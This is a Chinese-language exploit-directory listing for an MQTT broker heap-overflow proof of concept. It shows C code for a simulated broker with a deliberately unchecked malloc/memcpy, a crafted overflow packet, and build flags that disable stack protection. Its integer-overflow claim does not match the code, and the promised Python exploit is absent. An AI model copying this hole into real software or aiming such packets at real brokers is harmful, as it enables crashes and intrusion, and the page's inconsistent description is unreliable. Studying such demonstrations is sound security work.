Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow — 演示了 CVE-2026-2222 中 MQTT CONNECT 数据包处理过程中的堆溢出漏洞,附带一个模拟的易受攻击的代理服务器以及用于远程代码执行的概念验证利用代码。 | Kitploit
工具/GitHubGitHub/george0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow
物联网安全漏洞分析漏洞利用学习与教育二进制利用
GitHubgeorge0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow

CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow

演示了 CVE-2026-2222 中 MQTT CONNECT 数据包处理过程中的堆溢出漏洞,附带一个模拟的易受攻击的代理服务器以及用于远程代码执行的概念验证利用代码。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
18天前尚未审核

CVE-2026-2222 – MQTT Broker CONNECT 数据包堆溢出

程序代码(C + Python)

root@kitploit:~
// mqtt_broker_sim.c - Simulated vulnerable MQTT broker
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct mqtt_connect {
    char protocol_name[8];
    uint8_t protocol_level;
    uint8_t flags;
    uint16_t keepalive;
    // remaining length field misinterpreted
};

void process_connect(uint8_t *packet, size_t len) {
    // Assume we've parsed fixed header: remaining length = (packet[1] & 0x7F) + ...
    // For demo, we read a 2-byte "remaining length" from packet[1:3] and allocate that many bytes,
    // then copy payload without proper bounds.
    uint16_t remaining_length = (packet[1] << 8) | packet[2]; // should be encoded as variable length, but we misuse
    printf("Allocating %d bytes\n", remaining_length);
    char *buffer = malloc(remaining_length); // if remaining_length is crafted to wrap, small allocation
    // copy payload from packet+3 for remaining_length bytes -> heap overflow if remaining_length > len-3
    memcpy(buffer, packet+3, remaining_length); // overflow
    // process...
    free(buffer);
}

int main() {
    // Crafted malicious packet: remaining_length = 0xFFFF (65535) but actual packet size small
    uint8_t evil[] = {0x10, 0xFF, 0xFF, 0x00, 0x04, 'M','Q','T','T'}; // length 9
    process_connect(evil, sizeof(evil));
    return 0;
}

CVE-2026-2222 – MQTT Broker CONNECT 堆溢出

Severity: Critical

概述

MQTT CONNECT 数据包的剩余长度字段在解析过程中存在整数溢出,进而导致堆缓冲区溢出,使攻击者能够在代理上远程执行代码。

漏洞详情

  • 类型: 整数溢出 / 堆缓冲区溢出
  • 影响: 可在 MQTT 代理上远程执行代码,危及所有已连接的 IoT 设备。
  • 根本原因: 代理将剩余长度解码为 16 位值,并直接将其用于内存分配和复制,而未根据实际数据包大小进行验证。

漏洞利用演示

编译并运行模拟的易受攻击代理:

root@kitploit:~
gcc mqtt_broker_sim.c -o mqtt_broker_sim -fno-stack-protector -z execstack
./mqtt_broker_sim
下载工具